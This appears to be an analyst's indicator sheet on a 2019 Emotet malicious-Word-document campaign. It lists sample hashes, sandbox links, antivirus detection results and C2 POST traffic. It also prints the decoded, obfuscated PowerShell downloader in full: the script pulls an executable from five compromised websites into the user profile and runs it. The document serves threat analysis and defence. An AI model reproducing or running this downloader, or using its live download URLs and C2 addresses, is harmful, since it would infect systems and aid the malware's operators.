- Github repo with maldocs: https://github.com/bloomer1016/2019-09-18-Emotet/tree/master
- Any.Run results for some
- =========================
- https://app.any.run/tasks/5d921b3e-fc42-48fd-96b4-a0c84c6df7ca
- https://app.any.run/tasks/a95d5234-04a9-4a86-b284-3189e92fad31
- https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7
- Maldoc name and hashes
- =======================
- 844545613263975.doc = d0549a23f032dd31c0b4f6ce52dc2b68
- BL_4FGY5QJ54MQ.doc = 611e1f0d8d8b5ea6021b80c57521dd5f
- BL_B5HP885M08_HB.doc = 2792353f03a08766d5a8a5cfcdc11755
- Documents503562.doc = c23fef65dca1134add0911598e144962
- FT_GNVGZ8X52TM.doc = 11aeba89608c7a1c76c03124c0deb224
- FT_Q8I5N0EAY6.doc = 23709a5f4e852eb64e8cb16bef0b4af3
- LLC_6001165714_L_09182019.doc = 8264fee8922f4a49728da27c23915c04
- RE_A5V5YRMEMG7EEN_09182019.doc = e0ebff22ce0e5083669ed163017610a3
- SCANMR-35747.doc = b06323ecc2d3d3c7520adddcede27b23
- info-09_18_2019233916.doc = 890b71c6603640a7b6afb9a1aa2c4db9
- Munin results
- ==============
- Online Hash Checker for Virustotal and Other Services
- Florian Roth - 0.13.0 April 2019
- [+] Writing results to new file: check-results_attach.csv
- [ ] Processing /attach/FT_Q8I5N0EAY6.doc ...
- [ ] Processing /attach/SCANMR-35747.doc ...
- [ ] Processing /attach/LLC_6001165714_L_09182019.doc ...
- [ ] Processing /attach/info-09_18_2019233916.doc ...
- [ ] Processing /attach/BL_B5HP885M08_HB.doc ...
- [ ] Processing /attach/FT_GNVGZ8X52TM.doc ...
- [ ] Processing /attach/844545613263975.doc ...
- [ ] Processing /attach/RE_A5V5YRMEMG7EEN_09182019.doc ...
- [ ] Processing /attach/BL_4FGY5QJ54MQ.doc ...
- [ ] Processing /attach/Documents503562.doc ...
- [+] Processing 10 lines ...
- 1 / 10 > Unknown
- HASH: 19aafd3b374956bb8ed67f231e0bb5797143e23f37617e66784cb29c3c6a10dd COMMENT: /attach/FT_Q8I5N0EAY6.doc
- RESULT: - / -
- 2 / 10 > Malicious
- HASH: f4903ce8ea06e78db686bccd687857f7129f425cb03b79ac39ee6a7ad5567d2e COMMENT: /attach/SCANMR-35747.doc
- VIRUS: Microsoft: Trojan:Script/Conteban.A!ml / TrendMicro: HEUR_VBA.O2
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 19:50:41 COMMENTS: 0 USERS: -
- RESULT: 16 / 56
- 3 / 10 > Malicious
- HASH: 6dba64beab05a8cbbbb0c7ed465447c1ddd4484daa784737860f48b3c835336e COMMENT: /attach/LLC_6001165714_L_09182019.doc
- VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 19:11:50 COMMENTS: 0 USERS: -
- RESULT: 14 / 58
- 4 / 10 > Unknown
- HASH: 44193897b15e5b25abd4fdaec44923b9b44eef2d49b330934bc47f91d6a82107 COMMENT: /attach/info-09_18_2019233916.doc
- RESULT: - / -
- 5 / 10 > Unknown
- HASH: 7b2142363813a41fd3a512ca6bbd2e3d73d274558f58ca990d78a1537ebfcbd8 COMMENT: /attach/BL_B5HP885M08_HB.doc
- RESULT: - / -
- 6 / 10 > Malicious
- HASH: 4a89881dbe35b5b96414f7f258ce83bb65b908330a2d01a73a38996cf4766345 COMMENT: /attach/FT_GNVGZ8X52TM.doc
- VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 18:01:08 COMMENTS: 0 USERS: -
- RESULT: 14 / 56
- 7 / 10 > Unknown
- HASH: 5c39f7d201d031baea0aa681c8b159c59beaca86729cb6cbaaa1b3d30b7386ed COMMENT: /attach/844545613263975.doc
- RESULT: - / -
- 8 / 10 > Malicious
- HASH: 4b00391f7bbb49f146f425f7beb285222e26de316b87e4fd8e70e490015a1bec COMMENT: /attach/RE_A5V5YRMEMG7EEN_09182019.doc
- VIRUS: Microsoft: Trojan:Win32/Ludicrouz.O / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 18:09:01 COMMENTS: 0 USERS: -
- RESULT: 14 / 58
- 9 / 10 > Malicious
- HASH: e52d9448e78d875f07fc9cdbe18ebbf755a69b95aec37d147d0ce509de3e7c66 COMMENT: /attach/BL_4FGY5QJ54MQ.doc
- VIRUS: Microsoft: Trojan:O97M/Sonbokli.A!cl / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 18:03:11 COMMENTS: 0 USERS: -
- RESULT: 13 / 58
- 10 / 10 > Malicious
- HASH: 42f0de30c375368ea3c82c734129cf1902476f44404e4d7eaef3bfd5f1a1cf8a COMMENT: /attach/Documents503562.doc
- VIRUS: Microsoft: Trojan:Script/Oneeva.A!ml / TrendMicro: HEUR_VBA.O2 / Symantec: ISB.Downloader!gen186
- TYPE: - FILENAMES: -
- FIRST: - LAST: 2019-09-18 17:33:40 COMMENTS: 0 USERS: -
- RESULT: 16 / 59
- PoSH encoded command
- =====================
- Decoded PoSH command
- ====================
- $Pai1Ui13='pATcSjl'
- $wiaYWE = '133'
- $jL_KnSZ2='dbtZD3ui'
- $G2wvAOC=$env:userprofile+'\'+$wiaYWE+'.exe'
- $z5EwO2v='szOGPK'
- $Q8kzjz0=&('new-obje'+'c'+'t') neT.weBclIEnT
- $nbLONdWV='https://www.patrickglobalusa.com/wp-admin/fSRkAFjqv/
- https://pipizhanzhang.com/wp-admin/3ciornz_iulayscz-679646/
- https://tankhoi.vn/wp-includes/XTSugzNaz/
- https://www.supercrystal.am/wp-admin/PdMInSgs/
- https://hotel-bristol.lu/dlry/MAnJIPnY/'."Sp`lit"('
- ')
- $QNBE_r9='O5Za1CU'
- foreach($S6f8RWR in $nbLONdWV){try{$Q8kzjz0."d`OW`NlOAD`FiLE"($S6f8RWR, $G2wvAOC)
- $pHL7wh='QLVVdP8'
- If ((.('Ge'+'t-'+'Item') $G2wvAOC)."LE`NGTH" -ge 28807) {[Diagnostics.Process]::"StA`RT"($G2wvAOC)
- $oS9MG93='E1Bu6jOX'
- break
- $TbfJaY='Bzpc_Zs'}}catch{}}$DmAOEN='mRbb1P38'
- C2's traffic
- =============
- POST http://190.18.146.70/mult/cookies/
- POST http://187.147.50.167:8080/entries/odbc/
- POST http://178.254.6.27:7080/ban/codec/sess/merge/
- POST http://92.222.125.16:7080/tpt/tpt/sess/
- POST http://142.44.162.209:8080/ringin/
- POST http://31.12.67.62:7080/arizona/
- POST http://45.123.3.54:443/pnp/
- POST http://201.250.11.236:50000/codec/
- POST http://41.220.119.246/jit/
- POST http://86.98.25.30:53/arizona/
- POST http://37.157.194.134:443/teapot/
- POST http://187.144.189.58:50000/codec/
- POST http://189.209.217.49/jit/
- POST http://31.172.240.91:8080/arizona/
- POST http://104.131.11.150:8080/teapot/
- POST http://59.152.93.46:443/site/
- POST http://222.214.218.192:8080/arizona/
- POST http://162.243.125.212:8080/teapot/
- POST http://169.239.182.217:8080/site/
- POST http://85.104.59.244:20/xian/
- POST http://95.128.43.213:8080/arizona/
- POST http://91.92.191.134:8080/site/
- POST http://144.139.247.220/xian/
- POST http://87.230.19.21:8080/loadan/
- POST http://117.197.124.36:443/teapot/
- POST http://173.212.203.26:8080/site/
- POST http://206.189.98.125:8080/xian/
- POST http://45.33.49.124:443/loadan/
- POST http://62.75.187.192:8080/codec/iplk/sess/merge/
- POST http://136.243.177.26:8080/iplk/psec/sess/
- POST http://91.205.215.66:8080/usbccid/badge/
- POST http://186.4.172.5:443/iplk/balloon/sess/
- POST http://185.129.92.210:7080/vermont/
- POST http://182.176.132.213:8090/report/
- POST http://87.106.139.101:8080/child/
- POST http://87.106.136.232:8080/dma/
- POST http://188.166.253.46:8080/iplk/
- POST http://37.208.39.59:7080/child/
- POST http://185.94.252.13:443/attrib/merge/sess/
- POST http://175.100.138.82:22/pdf/sym/
- POST http://78.24.219.147:8080/attrib/bml/sess/
- POST http://201.212.57.109/pnp/
- POST http://217.160.182.191:8080/entries/
- POST http://186.4.172.5:8080/forced/
- POST http://138.201.140.110:8080/mult/
- POST http://182.76.6.2:8080/health/
- POST http://190.145.67.134:8090/acquire/
- POST http://47.41.213.2:22/entries/
- POST http://159.65.25.128:8080/forced/
- POST http://75.127.14.170:8080/ringin/
- POST http://190.201.164.223:53/mult/
- POST http://94.205.247.10/health/
- POST http://177.246.193.139:20/entries/
- POST http://149.202.153.252:8080/forced/
- POST http://88.156.97.210/ringin/
- POST http://178.79.161.166:443/mult/
- POST http://46.105.131.87/health/
- POST http://211.63.71.72:8080/cab/prep/sess/
- POST http://179.32.19.219:22/enable/publish/sess/merge/
- POST http://190.186.203.55/arizona/iab/sess/merge/
- POST http://104.236.246.93:8080/publish/schema/sess/
- POST http://92.222.216.44:8080/psec/
- POST http://212.71.234.16:8080/raster/
- POST http://182.176.106.43:995/entries/
- POST http://190.18.146.70/sess/
- POST http://187.147.50.167:8080/enable/
- POST http://178.254.6.27:7080/raster/
- POST http://92.222.125.16:7080/entries/
- POST http://142.44.162.209:8080/tlb/
- POST http://31.12.67.62:7080/sess/
- POST http://45.123.3.54:443/enable/
- POST http://201.250.11.236:50000/health/
- POST http://41.220.119.246/raster/
- POST http://86.98.25.30:53/glitch/
- POST http://37.157.194.134:443/tlb/
- POST http://187.144.189.58:50000/sess/
- POST http://189.209.217.49/enable/
- POST http://31.172.240.91:8080/health/
- POST http://104.131.11.150:8080/raster/
- POST http://59.152.93.46:443/glitch/
- POST http://222.214.218.192:8080/sess/
- POST http://162.243.125.212:8080/enable/
- POST http://169.239.182.217:8080/codec/
- POST http://85.104.59.244:20/raster/
- POST http://95.128.43.213:8080/glitch/
- POST http://91.92.191.134:8080/srvc/
- POST http://144.139.247.220/enable/
- POST http://87.230.19.21:8080/codec/
- POST http://117.197.124.36:443/scripts/
- POST http://173.212.203.26:8080/glitch/
- POST http://206.189.98.125:8080/arizona/
- POST http://45.33.49.124:443/srvc/
- POST http://62.75.187.192:8080/schema/arizona/ringin/merge/
- POST http://136.243.177.26:8080/devices/loadan/ringin/
- POST http://91.205.215.66:8080/devices/free/
- POST http://186.4.172.5:443/prep/jit/ringin/
- POST http://185.129.92.210:7080/json/add/ringin/merge/
- POST http://182.176.132.213:8090/mult/stubs/
- POST http://87.106.139.101:8080/acquire/ringin/ringin/merge/
- POST http://87.106.136.232:8080/xian/prep/ringin/merge/
- POST http://188.166.253.46:8080/raster/publish/ringin/
- POST http://37.208.39.59:7080/vermont/
- POST http://185.94.252.13:443/iab/
- POST http://175.100.138.82:22/between/
- POST http://78.24.219.147:8080/enabled/
- POST http://201.212.57.109/vermont/
- POST http://217.160.182.191:8080/iab/
- POST http://186.4.172.5:8080/between/
- POST http://138.201.140.110:8080/vermont/
- POST http://182.76.6.2:8080/iab/
- POST http://190.145.67.134:8090/between/
- POST http://47.41.213.2:22/enabled/
- POST http://159.65.25.128:8080/vermont/
- POST http://75.127.14.170:8080/schema/
- POST http://190.201.164.223:53/between/
- POST http://94.205.247.10/enabled/
- POST http://177.246.193.139:20/schema/
- POST http://149.202.153.252:8080/between/
- POST http://88.156.97.210/sym/
- POST http://178.79.161.166:443/prov/
- POST http://46.105.131.87/schema/
- POST http://211.63.71.72:8080/between/
- POST http://179.32.19.219:22/sym/
- POST http://190.186.203.55/prov/
- POST http://104.236.246.93:8080/publish/free/ringin/merge/
- POST http://92.222.216.44:8080/pnp/add/
- POST http://212.71.234.16:8080/attrib/stubs/ringin/merge/
- POST http://182.176.106.43:995/enable/ringin/ringin/merge/
- POST http://190.18.146.70/taskbar/
- POST http://187.147.50.167:8080/ban/schema/ringin/
- POST http://178.254.6.27:7080/walk/prov/ringin/
- POST http://92.222.125.16:7080/codec/
- POST http://142.44.162.209:8080/ringin/
- POST http://31.12.67.62:7080/add/